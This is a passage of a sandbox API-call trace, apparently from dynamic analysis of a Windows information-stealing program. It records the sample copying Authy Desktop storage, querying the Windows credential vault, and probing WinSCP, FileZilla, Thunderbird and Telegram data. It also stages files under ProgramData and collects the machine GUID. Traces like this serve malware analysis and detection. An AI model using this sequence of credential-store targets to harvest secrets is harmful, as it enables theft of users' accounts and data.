"c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authy\\8"), bFailIfExists=1) returned 0 [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970080 | out: hHeap=0x29a0000) returned 1 [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.183] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0109.183] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x98) returned 0x3970048 [0109.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=76, lpWideCharStr=0x3970048, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb\\*") returned 76 [0109.183] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.183] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb\\*", lpFindFileData=0x19f120 | out: lpFindFileData=0x19f120*(dwFileAttributes=0x1c00001c, ftCreationTime.dwLowDateTime=0x58, ftCreationTime.dwHighDateTime=0x29a0000, ftLastAccessTime.dwLowDateTime=0x77926588, ftLastAccessTime.dwHighDateTime=0x2400ebcf, ftLastWriteTime.dwLowDateTime=0x98, ftLastWriteTime.dwHighDateTime=0x29a0000, nFileSizeHigh=0x29a04b6, nFileSizeLow=0xb081112, dwReserved0=0x77926588, dwReserved1=0xe00000e, cFileName="(", cAlternateFileName="&")) returned 0xffffffff [0109.183] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.183] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1c) returned 0x3970048 [0109.184] FindNextFileW (in: hFindFile=0xffffffff, lpFindFileData=0x19f120 | out: lpFindFileData=0x19f120*(dwFileAttributes=0x1c00001c, ftCreationTime.dwLowDateTime=0x58, ftCreationTime.dwHighDateTime=0x29a0000, ftLastAccessTime.dwLowDateTime=0x77926588, ftLastAccessTime.dwHighDateTime=0x2400ebcf, ftLastWriteTime.dwLowDateTime=0x98, ftLastWriteTime.dwHighDateTime=0x29a0000, nFileSizeHigh=0x29a04b6, nFileSizeLow=0xb081112, dwReserved0=0x77926588, dwReserved1=0xe00000e, cFileName="(", cAlternateFileName="&")) returned 0 [0109.184] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.184] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.184] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.184] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft"), lpSecurityAttributes=0x0) returned 0 [0109.184] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.184] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.184] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authynew"), lpSecurityAttributes=0x0) returned 1 [0109.184] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.184] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0109.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1428, cbMultiByte=20, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0109.184] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a1478 [0109.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1428, cbMultiByte=20, lpWideCharStr=0x29a1478, cchWideChar=20 | out: lpWideCharStr="files\\Soft\\AuthyNew") returned 20 [0109.184] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a14a8 [0109.184] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1078, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0109.184] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x52) returned 0x3970070 [0109.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1078, cbMultiByte=41, lpWideCharStr=0x3970070, cchWideChar=41 | out: lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1") returned 41 [0109.185] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a11c0 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970070 | out: hHeap=0x29a0000) returned 1 [0109.185] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8e) returned 0x3970070 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0109.185] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x3970108 [0109.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="(", cchWideChar=2, lpMultiByteStr=0x3970108, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(", lpUsedDefaultChar=0x0) returned 2 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0109.185] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a11c0 [0109.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a11c0, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0109.185] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x98) returned 0x29a1218 [0109.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a11c0, cbMultiByte=76, lpWideCharStr=0x29a1218, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb\\(") returned 76 [0109.185] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x3970330 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1218 | out: hHeap=0x29a0000) returned 1 [0109.185] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Authy Desktop\\Local Storage\\leveldb\\(" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\authy desktop\\local storage\\leveldb\\("), lpNewFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\(" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authynew\\("), bFailIfExists=1) returned 0 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970070 | out: hHeap=0x29a0000) returned 1 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.185] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.185] GetVersionExA (in: lpVersionInformation=0x19f5cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x19f5cc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0109.189] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x6cc50000 [0109.565] GetProcAddress (hModule=0x6cc50000, lpProcName="VaultOpenVault") returned 0x6cc5bc10 [0109.565] GetProcAddress (hModule=0x6cc50000, lpProcName="VaultCloseVault") returned 0x6cc5bc90 [0109.565] GetProcAddress (hModule=0x6cc50000, lpProcName="VaultEnumerateItems") returned 0x6cc5b960 [0109.565] GetProcAddress (hModule=0x6cc50000, lpProcName="VaultGetItem") returned 0x6cc5bb70 [0109.566] GetProcAddress (hModule=0x6cc50000, lpProcName="VaultFree") returned 0x6cc67050 [0109.566] VaultOpenVault () returned 0x0 [0109.567] VaultEnumerateItems () returned 0x0 [0109.568] VaultCloseVault () returned 0x0 [0109.568] FreeLibrary (hLibModule=0x6cc50000) returned 1 [0109.571] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Martin Prikryl\\WinSCP 2\\Configuration", ulOptions=0x0, samDesired=0x1, phkResult=0x19e7a0 | out: phkResult=0x19e7a0*=0x0) returned 0x2 [0109.576] GetUserNameA (in: lpBuffer=0x19f22c, pcbBuffer=0x19f228 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f228) returned 1 [0109.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0109.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0109.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x84) returned 0x3970048 [0109.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=66, lpWideCharStr=0x3970048, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 66 [0109.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.661] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\filezilla\\recentservers.xml")) returned 0xffffffff [0109.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.661] SHGetFolderPathA (in: hwnd=0x0, csidl=32794, hToken=0x0, dwFlags=0x0, pszPath=0x19f340 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0109.662] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpString2="\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0109.662] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\" [0109.662] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\", lpString2="..\\profiles.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" [0109.662] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Thunderbird\\Profiles\\..\\profiles.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\thunderbird\\profiles.ini")) returned 0xffffffff [0109.662] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.662] CreateDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\telegram"), lpSecurityAttributes=0x0) returned 1 [0109.662] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.662] GetLastError () returned 0x3 [0109.662] SetLastError (dwErrCode=0x3) [0109.662] GetLastError () returned 0x3 [0109.662] SetLastError (dwErrCode=0x3) [0109.662] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.662] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] GetLastError () returned 0x3 [0109.663] SetLastError (dwErrCode=0x3) [0109.663] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\\\*", lpFindFileData=0x19f0ec | out: lpFindFileData=0x19f0ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ðñt")) returned 0xffffffff [0109.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.664] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.664] GetLastError () returned 0x3 [0109.664] SetLastError (dwErrCode=0x3) [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\\\*", lpFindFileData=0x19f0ec | out: lpFindFileData=0x19f0ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ðñt")) returned 0xffffffff [0109.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.665] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] GetLastError () returned 0x3 [0109.665] SetLastError (dwErrCode=0x3) [0109.665] GetLastError () returned 0x3 [0109.666] SetLastError (dwErrCode=0x3) [0109.666] GetLastError () returned 0x3 [0109.666] SetLastError (dwErrCode=0x3) [0109.666] GetLastError () returned 0x3 [0109.666] SetLastError (dwErrCode=0x3) [0109.666] GetLastError () returned 0x3 [0109.666] SetLastError (dwErrCode=0x3) [0109.666] GetLastError () returned 0x3 [0109.666] SetLastError (dwErrCode=0x3) [0109.666] GetLastError () returned 0x3 [0109.666] SetLastError (dwErrCode=0x3) [0109.666] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Telegram Desktop\\\\*", lpFindFileData=0x19f0ec | out: lpFindFileData=0x19f0ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ðñt")) returned 0xffffffff [0109.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.666] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.666] DeleteFileA (lpFileName="c" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\c")) returned 0 [0109.666] DeleteFileA (lpFileName="h" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\h")) returned 0 [0109.666] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.666] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1")) returned 1 [0109.667] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.667] CreateFileW (lpFileName="files\\information.txt" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\information.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x19f5a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0109.667] GetFileType (hFile=0x28) returned 0x1 [0109.668] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f6c8 | out: lpSystemTimeAsFileTime=0x19f6c8*(dwLowDateTime=0x3566a5b7, dwHighDateTime=0x1d7b3bd)) [0109.668] GetLastError () returned 0x0 [0109.668] SetLastError (dwErrCode=0x0) [0109.668] GetLastError () returned 0x0 [0109.668] SetLastError (dwErrCode=0x0) [0109.668] GetLastError () returned 0x0 [0109.668] SetLastError (dwErrCode=0x0) [0109.668] GetTimeZoneInformation (in: lpTimeZoneInformation=0x4d4e00 | out: lpTimeZoneInformation=0x4d4e00) returned 0x2 [0109.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Standard Time", cchWideChar=-1, lpMultiByteStr=0x4d2ce8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x19f640 | out: lpMultiByteStr="W. Europe Standard Time", lpUsedDefaultChar=0x19f640) returned 24 [0109.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="W. Europe Daylight Time", cchWideChar=-1, lpMultiByteStr=0x4d2d28, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x19f640 | out: lpMultiByteStr="W. Europe Daylight Time", lpUsedDefaultChar=0x19f640) returned 24 [0109.668] GetLastError () returned 0x0 [0109.668] SetLastError (dwErrCode=0x0) [0109.668] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1000) returned 0x29a2758 [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.669] SetLastError (dwErrCode=0x0) [0109.669] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] GetLastError () returned 0x0 [0109.670] SetLastError (dwErrCode=0x0) [0109.670] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f4d4 | out: phkResult=0x19f4d4*=0x35c) returned 0x0 [0109.670] RegQueryValueExA (in: hKey=0x35c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x19f4d8, lpcbData=0x19f4d0*=0xff | out: lpType=0x0, lpData=0x19f4d8*=0x30, lpcbData=0x19f4d0*=0x25) returned 0x0 [0109.671] RegCloseKey (hKey=0x35c) returned 0x0 [0109.671] CharToOemA (in: pSrc="03845cb8-7441-4a2f-8c0f-c90408af5778", pDst=0x19f5d8 | out: pDst="03845cb8-7441-4a2f-8c0f-c90408af5778") returned 1 [0109.671] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.671] GetLastError () returned 0x0 [0109.671] SetLastError (dwErrCode=0x0) [0109.672] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.673] GetCurrentHwProfileA (in: lpHwProfileInfo=0x19f65c | out: lpHwProfileInfo=0x19f65c) returned 1 [0109.673] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.673] GetLastError () returned 0x0 [0109.673] SetLastError (dwErrCode=0x0) [0109.673] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] GetLastError () returned 0x0 [0109.674] SetLastError (dwErrCode=0x0) [0109.674] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.674] GetCurrentHwProfileA (in: lpHwProfileInfo=0x19f59c | out: lpHwProfileInfo=0x19f59c) returned 1 [0109.674] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a10d0 [0109.674] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0109.675] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f414 | out: phkResult=0x19f414*=0x35c) returned 0x0 [0109.675] RegQueryValueExA (in: hKey=0x35c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x19f418, lpcbData=0x19f410*=0xff | out: lpType=0x0, lpData=0x19f418*=0x30, lpcbData=0x19f410*=0x25) returned 